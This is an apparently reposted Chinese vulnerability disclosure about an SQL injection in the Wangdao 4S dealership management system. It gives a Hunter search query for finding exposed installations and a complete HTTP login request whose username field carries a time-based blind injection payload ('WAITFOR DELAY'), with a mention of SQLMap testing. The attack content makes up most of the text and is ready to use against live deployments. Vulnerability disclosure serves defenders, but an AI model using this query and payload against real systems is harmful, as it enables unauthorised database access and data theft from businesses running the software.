王道4S管理系统存在SQL注入漏洞

admin 2024年4月14日19:03:24评论29 views字数 829阅读2分45秒阅读模式

需要EDU SRC邀请码的师傅可以私聊后台,免费赠送EDU SRC邀请码(邀请码管够)

王道4S管理系统存在SQL注入漏洞

资产测绘

王道4S管理系统存在SQL注入漏洞
hunter:web.body="PixelsPerInch"&&web.body="AxBorderStyle"&&web.body="DropTarget"

王道4S管理系统存在SQL注入漏洞

王道4S管理系统存在SQL注入漏洞

王道4S管理系统存在SQL注入漏洞

漏洞复现

王道4S管理系统存在SQL注入漏洞
POST / HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestX-MicrosoftAjax: Delta=trueCache-Control: no-cacheContent-Type: application/x-www-form-urlencoded; charset=utf-8Content-Length: 219Connection: closeCookie: ASP.NET_SessionId=e5zzymvrqc2ah0dg5xro1lbiScriptManager1=UpdatePanel3|btnLogin&__EVENTTARGET=btnLogin&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=&ddlUserName=&txtUserName=1';WAITFOR DELAY '0:0:5'--&txtPassWord=1&cbBossedBroadcast=on&txtMACAddr=&__ASYNCPOST=true&

王道4S管理系统存在SQL注入漏洞

王道4S管理系统存在SQL注入漏洞

SQLMap测试

王道4S管理系统存在SQL注入漏洞

王道4S管理系统存在SQL注入漏洞

王道4S管理系统存在SQL注入漏洞

原文始发于微信公众号(银遁安全团队):王道4S管理系统存在SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月14日19:03:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   王道4S管理系统存在SQL注入漏洞http://cn-sec.com/archives/2656052.html

发表评论

匿名网友 填写信息